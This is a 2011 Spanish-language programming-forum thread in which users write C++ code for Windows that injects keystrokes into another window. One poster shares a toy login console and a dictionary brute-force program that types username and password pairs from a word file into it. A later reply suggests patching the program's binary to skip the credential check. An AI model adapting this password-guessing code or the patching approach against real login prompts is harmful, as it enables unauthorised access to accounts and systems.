Ataque por fuerza bruta en c++

Iniciado por <<<-Basura->>>, 20 Junio 2011, 05:03 AM

0 Miembros y 1 Visitante están viendo este tema.

Khronos14

#10
Mira este pequeño ejemplo que acabo de hacer:

Código (cpp) [Seleccionar]

#include <iostream>
#include <Windows.h>

int main(int argc, char * argv[])
{
HWND hCalc = FindWindow(NULL, L"Calculadora"); //Obtenemos el Handle de la ventana de la calculadora
if (hCalc != 0)
{
SetForegroundWindow(hCalc); //Hacemos que la calculadora tenga el foco para enviarle las teclas
keybd_event((BYTE)VkKeyScan('2'), 0, 0, 0); //Pulsamos la tecla 2
keybd_event((BYTE)VkKeyScan('2'), 0, 2, 0); //Levantamos la tecla

keybd_event(VK_ADD, 0, 0, 0); //Pulsamos +
keybd_event(VK_ADD, 0, 2, 0); //Levantamos +

keybd_event((BYTE)VkKeyScan('3'), 0, 0, 0); //Pulsamos la tecla 3
keybd_event((BYTE)VkKeyScan('3'), 0, 2, 0); //Levantamos la tecla 3

keybd_event(VK_RETURN, 0, 0, 0); //Pulsamos enter
keybd_event(VK_RETURN, 0, 2, 0); //Levantamos enter

/*
* Con estas pulsaciones la calculadora debería sumar 2 + 3
*/
}
else
std::cout << "No se encontró la ventana" << std::endl;

std::cin.get();
return 0;
}


Para que funcione, tienes que tener la calculadora abierta. Otro método de buscar la ventana es mediante las APIs para trabajar con procesos, como: Process32First,  CreateToolhelp32Snapshot, etc..

Aquí tienes una tabla con todas las Virtual Key Codes:

http://msdn.microsoft.com/en-us/library/dd375731(v=vs.85).aspx

Saludos.

fantasma306

Es mejor callar y que piensen que eres idiota a hablar y demostrarlo.

El_Java

Si es para lo de nuestro proyecto, creo que con hacer un socket udp que se conectara con la direccion 192.168.1.1 del localhost nos valdría, pero claro, esto es teoría, tendre que comprobarlo... xD

el codigo de Khronos14 es solo para Windows, no?

Khronos14

Hola El_Java, sí, el código sólo funciona en Windows.

Saludos.

fantasma306

Bueno aqui tengo un codigo basandome en lo que dijo Khronos14 pero no funciona muy bien, los datos se envian correctamente pero se cierra la consola que pide el login y contraseña:

Victima
Código (cpp) [Seleccionar]
#include <iostream>
#include <string>
using namespace std;
   
const string usu = "aaa";
const string pas = "cab";

int main(){
string USU;
string PAS;
    do{
system("title LOGIN");
cout << "Usuario: ";
cin >> USU;
cout << "Password: ";
cin >> PAS;
    }while(usu!=USU && pas!=PAS);
    return 0;
}


BruteForce
Código (cpp) [Seleccionar]
#include <iostream>
#include <fstream>
#include <string>
#include <Windows.h>
using namespace std;

bool enviar(string login, string pass);

int main(){
const HANDLE Consola = GetStdHandle(STD_OUTPUT_HANDLE);
string login, pswd;
ifstream pass("dico.txt");
ifstream user("dico.txt");
if(pass.is_open() && user.is_open()){
bool seguir=true;
while(!user.eof() && seguir){
user>>login;
while(!pass.eof() && seguir){
pass>>pswd;
SetForegroundWindow((HWND)Consola);
seguir=enviar(login,pswd);
Sleep(1000);
}
}

}
system("pause");
return 0;
}

bool enviar(string login, string pass){
HWND hCalc = FindWindow(NULL, TEXT("LOGIN"));//Obtenemos el Handle de la ventana de la calculadora
if (hCalc != 0){
cout<<"User: "<<login<<endl;
cout<<"Pass: "<<pass<<endl;
SetForegroundWindow(hCalc);

/*enviar pass*/
for(register int i=0;i<login.size();i++){
keybd_event((BYTE)VkKeyScan(login[i]), 0, 0, 0);
keybd_event((BYTE)VkKeyScan(login[i]), 0, 2, 0);
}
keybd_event(VK_RETURN, 0, 0, 0); //Pulsamos enter
keybd_event(VK_RETURN, 0, 2, 0); //Levantamos enter

/*enviar login*/
for(register int i=0;i<pass.size();i++){
keybd_event((BYTE)VkKeyScan(pass[i]), 0, 0, 0);
keybd_event((BYTE)VkKeyScan(pass[i]), 0, 2, 0);
}
keybd_event(VK_RETURN, 0, 0, 0); //Pulsamos enter
keybd_event(VK_RETURN, 0, 2, 0); //Levantamos enter

return true;
}
else
return false;
}



no se en que falla...
Es mejor callar y que piensen que eres idiota a hablar y demostrarlo.

Khronos14

Creo que te falta un cin.clear() en el código de la víctima.

Saludos.


leogtz

¿Por qué no haces la prueba con tuberías?, es decir, que el programa espere el user y el password de la entrada estándar y se lo mandas con un comando.

type words | programa
ó
cat words | programa
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

fantasma306

Cita de: Khronos14 en 21 Junio 2011, 17:45 PM
Creo que te falta un cin.clear() en el código de la víctima.

Saludos.

no me ha funcionado, sigue igual :S

Cita de: Leo Gutiérrez. en 21 Junio 2011, 17:49 PM
¿Por qué no haces la prueba con tuberías?, es decir, que el programa espere el user y el password de la entrada estándar y se lo mandas con un comando.

type words | programa
ó
cat words | programa

para programar "pipes" o "tuberias" hay que modificar el programa Victima, para establecer una comunicacion,
y lo que se quiere hacer es que se pueda enviar datos a otra consola, sin conocer el codigo que tiene... lo de las consolas es solo para hacer la prueba...

saludos
Es mejor callar y que piensen que eres idiota a hablar y demostrarlo.

leogtz

Cita de: fantasma306 en 21 Junio 2011, 17:54 PM
no me ha funcionado, sigue igual :S

para programar "pipes" o "tuberias" hay que modificar el programa Victima, para establecer una comunicacion,
y lo que se quiere hacer es que se pueda enviar datos a otra consola, sin conocer el codigo que tiene... lo de las consolas es solo para hacer la prueba...

saludos

Ah, entiendo, yo pensé que solo lo hacía por probar... .En fín, saludos.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

do-while

¡Buenas!

No se si se podria hacer de esta forma o no. Durante un tiempo estuve trasteando con la ingenieria inversa. Las funciones de lectura, si leen cadenas, necesitan la diereccion de memoria de la cadena en la que almacenan datos. Esta parte de la memoria supongo que sera de lectura/escritura. Lo que podrias intentar es parchear la lectura de los datos, para escribir la cadena desde fuera del programa e introducir un salto a la parte en la que se comprueba si el user/pass es correcto, y asi hasta que encuentres un par valido... Asi te olvidas de las APIs y el programa es mas portable... Pero ya te digo, solo es una idea.

¡Saludos!

   
Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje
- Doctor, confundo los números y los colores.
- Vaya marrón.
- ¿Marrón? ¡Por el culo te la hinco!